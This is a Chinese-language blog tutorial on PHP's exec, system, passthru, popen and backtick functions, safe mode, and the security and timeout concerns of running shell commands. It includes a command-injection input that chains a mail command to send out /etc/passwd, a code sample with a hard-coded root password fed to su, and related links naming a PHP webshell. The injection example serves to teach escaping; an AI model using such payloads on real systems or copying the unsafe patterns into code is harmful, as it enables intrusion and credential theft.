`
再逢山水
  • 浏览: 152598 次
  • 性别: Icon_minigender_1
  • 来自: 深圳
社区版块
存档分类
最新评论

php中exec,system及passthru等函数用法

    博客分类:
  • LAMP
 
阅读更多
由于PHP基本是用于WEB程序开发的,所以调用外部系统命令安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安全模式。
如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制:
引用
执行外部命令
在打开文件时有些限制
连接MySQL数据库
基于HTTP的认证



在安全模式下,只有在特定目录中的外部程序才可以被执行,对其它程序的调用将被拒绝。这个目录可以在php.ini文件中用safe_mode_exec_dir指令,或在编译PHP是加上--with-exec-dir选项来指定,默认是/usr/local/php/bin。
如果你调用一个应该可以输出结果的外部命令(意思是PHP脚本没有错误),得到的却是一片空白,那么很可能你的网管已经把PHP运行在安全模式下了。
如何做?

在PHP中调用外部命令,可以用如下三种方法来实现:
1) 用PHP提供的专门函数
PHP提供共了3个专门的执行外部命令的函数:system(),exec(),passthru()。
system()
原型:string system (string command [, int return_var])
system()函数很其它语言中的差不多,它执行给定的命令,输出和返回结果。第二个参数是可选的,用来得到命令执行后的状态码。
例子:
system("/usr/local/bin/webalizer/webalizer");


exec()
原型:string exec (string command [, string array [, int return_var]])
exec()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array可以得到完整的结果,方法是把结果逐行追加到array的结尾处。所以如果array不是空的,在调用之前最好用unset()最它清掉。只有指定了第二个参数时,才可以用第三个参数,用来取得命令执行的状态码。
例子:
exec("/bin/ls -l");
exec("/bin/ls -l", $res);
exec("/bin/ls -l", $res, $rc);


passthru()
原型:void passthru (string command [, int return_var])
passthru()只调用命令,不返回任何结果,但把命令的运行结果原样地直接输出到标准输出设备上。所以passthru()函数经常用来调用象pbmplus(Unix下的一个处理图片的工具,输出二进制的原始图片的流)这样的程序。同样它也可以得到命令执行的状态码。
例子:
header("Content-type: image/gif");
passthru("./ppmtogif hunte.ppm");


2) 用popen()函数打开进程
上面的方法只能简单地执行命令,却不能与命令交互。但有些时候必须向命令输入一些东西,如在增加Linux的系统用户时,要调用su来把当前用户换到root才行,而su命令必须要在命令行上输入root的密码。这种情况下,用上面提到的方法显然是不行的。
popen()函数打开一个进程管道来执行给定的命令,返回一个文件句柄。既然返回的是一个文件句柄,那么就可以对它读和写了。在PHP3中,对这种句柄只能做单一的操作模式,要么写,要么读;从PHP4开始,可以同时读和写了。除非这个句柄是以一种模式(读或写)打开的,否则必须调用pclose()函数来关闭它。
例子1:

$fp=popen("/bin/ls -l", "r");


例子2(本例来自PHP中国联盟网站http://www.phpx.com/show.php?d=col&i=51):

/* PHP中如何增加一个系统用户
下面是一段例程,增加一个名字为james的用户,
root密码是 verygood。仅供参考
*/
$sucommand = "su --login root --command";
$useradd = "useradd ";
$rootpasswd = "verygood";
$user = "james";
$user_add = sprintf("%s "%s %s"",$sucommand,$useradd,$user);
$fp = @popen($user_add,"w");
@fputs($fp,$rootpasswd);
@pclose($fp);


3) 用反撇号(`,也就是键盘上ESC键下面的那个,和~在同一个上面)
这个方法以前没有归入PHP的文档,是作为一个秘技存在的。方法很简单,用两个反撇号把要执行的命令括起来作为一个表达式,这个表达式的值就是命令执行的结果。如:
$res='/bin/ls -l';
echo '
'.$res.'
';

这个脚本的输出就象:
hunte.gif
hunte.ppm
jpg.htm
jpg.jpg
passthru.php
要考虑些什么?
要考虑两个问题:安全性和超时。
先看安全性。比如,你有一家小型的网上商店,所以可以出售的产品列表放在一个文件中。你编写了一个有表单的HTML文件,让你的用户输入他们的EMAIL地址,然后把这个产品列表发给他们。假设你没有使用PHP的mail()函数(或者从未听说过),你就调用Linux/Unix系统的mail程序来发送这个文件。程序就象这样:

system("mail $to < products.txt");
echo "我们的产品目录已经发送到你的信箱:$to";


用这段代码,一般的用户不会产生什么危险,但实际上存在着非常大的安全漏洞。如果有个恶意的用户输入了这样一个EMAIL地址:
'--bla ; mail someone@domain.com < /etc/passwd ;'
那么这条命令最终变成:
'mail --bla ; mail someone@domain.com < /etc/passwd ; < products.txt'
我相信,无论哪个网络管理人员见到这样的命令,都会吓出一身冷汗来。
幸好,PHP为我们提供了两个函数:EscapeShellCmd()和EscapeShellArg()。函数EscapeShellCmd把一个字符串中所有可能瞒过Shell而去执行另外一个命令的字符转义。这些字符在Shell中是有特殊含义的,象分号(),重定向(>)和从文件读入(<)等。函数EscapeShellArg是用来处理命令的参数的。它在给定的字符串两边加上单引号,并把字符串中的单引号转义,这样这个字符串就可以安全地作为命令的参数。
再来看看超时问题。如果要执行的命令要花费很长的时间,那么应该把这个命令放到系统的后台去运行。但在默认情况下,象system()等函数要等到这个命令运行完才返回(实际上是要等命令的输出结果),这肯定会引起PHP脚本的超时。解决的办法是把命令的输出重定向到另外一个文件或流中,如:
system("/usr/local/bin/order_proc > /tmp/null &");

分享到:
评论

相关推荐

    php中使用exec,system等函数调用系统命令的方法(不建议使用,可导致安全问题)

    php的内置函数exec,system都可以调用系统命令(shell命令),当然还有passthru,escapeshellcmd等函数。 在很多时候利用php的exec,system等函数调用系统命令可以帮助我们更好更快的完成工作。比如前二天笔者在批量处理....

    Windows下php执行函数调用python 三种system&#40;&#41;,passthru&#40;&#41;,exec&#40;&#41;

    Windows下php执行函数调用python 三种system&#40;&#41;,passthru&#40;&#41;,exec&#40;&#41;

    PHP 命令行工具 shell_exec, exec, passthru, system详细使用介绍

    PHP 为执行外部命令提供大量函数,其中包括 shell_exec&#40;&#41;、exec&#40;&#41;、passthru&#40;&#41; 和 system&#40;&#41;。这些命令是相似的,但为您运行的外部程序提供不同的界面。

    php 执行外部程序函数详解

    该文档 详细介绍了 php 程序中 执行外部命令或程序的函数,如php system&#40;&#41; exec&#40;&#41; shell_exec&#40;&#41; passthru&#40;&#41; popen()等, 有具体的图片演示,可以一目了然的区别他们的不同用途!

    PHP全景系统网站源码(支持小程序+文字搭建教程)

    disable_functions = proc_open, popen, exec, system, shell_exec, passthru 这里要把 exec 去掉 重启 apache 就OK了 6.本源码必须安装在网站根目录,不支持二级目录!切记! 7.开启用户,网站文件读写权限!...

    PHP中16个高危函数整理

    php中内置了许许多多的函数,在它们的帮助下可以使我们更加快速的进行开发和维护,但是这个函数中依然有许多的函数伴有高风险的,比如说一下的16个函数不到万不得已不尽量不要使用,因为许多“高手”可以通过这些...

    详解php命令注入攻击

    PHP中可以使用下列四个函数来执行外部的应用程序或函数:system、exec、passthru、shell_exec。 信息来源——合天网安实验室 命令攻击为什么会形成漏洞? 首先是因为应用需要调用一些执行系统命令的函数,比如上面说...

    一些需要禁用的PHP危险函数(disable_functions)

    危险等级:中 passthru&#40;&#41; 功能描述:允许执行一个外部程序并回显输出,类似于 exec&#40;&#41;。 危险等级:高 exec&#40;&#41; 功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。 危险等级...

    2019最新720全景云系统可生成小程序带PC端+新手搭建教程

    disable_functions = proc_open, popen, exec, system, shell_exec, passthru 这里要把 exec 去掉 重启 apache 就OK了 6.本源码必须安装在网站根目录,不支持二级目录!切记! 7.开启用户,网站文件读写权限!...

    php一句话webshell 服务端和客户端

    php一句话webshell 服务端和客户端,一句话为 ...支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 zhaoxypass@yahoo.com.cn,欢迎下载使用,本软件为免费版。

    PHP 危险函数全解析

    危险等级:中 passthru&#40;&#41; 功能描述:允许执行一个外部程序并回显输出,类似于 exec&#40;&#41;。 危险等级:高 exec&#40;&#41; 功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。 危险等级...

    有关PHP性能优化的介绍

    # vi /etc/php.ini(1) PHP函数禁用找到:disable_functions =该选项可以设置哪些PHP函数是禁止使用的,PHP中有一些函数的风险性还是相当大的,可以直接执行一些系统级脚本命令,如果允许这些函数执行,当PHP程序...

    woodpecker:一个叫pecker的扫描器,用php写的,可以用词法分析检查危险函数

    'function' =&gt; array ( 'exec' , 'system' , 'create_function' , 'passthru' , 'shell_exec' , 'proc_open' , 'popen' , 'curl_exec' , 'parse_ini_file' , 'show_source' , 'include' , 'preg_replace' ), ...

    11亲测自留用最新版红包扫雷.zip

    替换disable_functions = passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_waitpid,pcntl_...

    如何使用PHP往windows中添加用户

    中的安全模式没有打开,并且关闭函数中没有关闭system&#40;&#41;、exec&#40;&#41;、passthru&#40;&#41;等函数。 ( 以下说明针对Windows2000/Windows XP/Windows 2003 ) 一、使用IIS做Web服务器 如果是使用IIS...

    PHP在linux上执行外部命令的方法

    在PHP中调用外部命令,可以用,1&gt;调用专门函数、2&gt;反引号、3&gt;popen()函数打开进程,三种方法来实现: 方法一:用PHP提供的专门函数(四个): PHP提供4个专门的执行外部命令的函数:exec&#40;&#41;, system&#40;&#...

    php实现统计IP数及在线人数的示例代码

    写在前面的话 很多人有这样的需求,就是...isable_functions = passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,po

    php代码审计之命令注入(3)

    文章目录system&#40;&#41;命令:exec&#40;&#41;:passthru&#40;&#41;:反引号:shell_exec:popen:proc_open:pcntl_exec:escapeshellarg():escapeshellcmd&#40;&#41;: system&#40;&#41;命令: string system &#...

    加强php的安全之一

    配置文件,默认在c:\windows目录中Safe Mode php的safe_mode功能对很多函数进行了限制或禁用了,能在很大程度解决php的安全问题。在Safe Mode部分找到: safe_mode = Off 改为: safe_mode = On 这样就打开了safe_...

    [PHP]实用函数9

    若是 return_var 参数存在,则执行 command 之后的状态会填入 return_var 中 string system(string command,int [return_var] //作为外部程序执行并显示原始输出 string passthru(string comma

Global site tag (gtag.js) - Google Analytics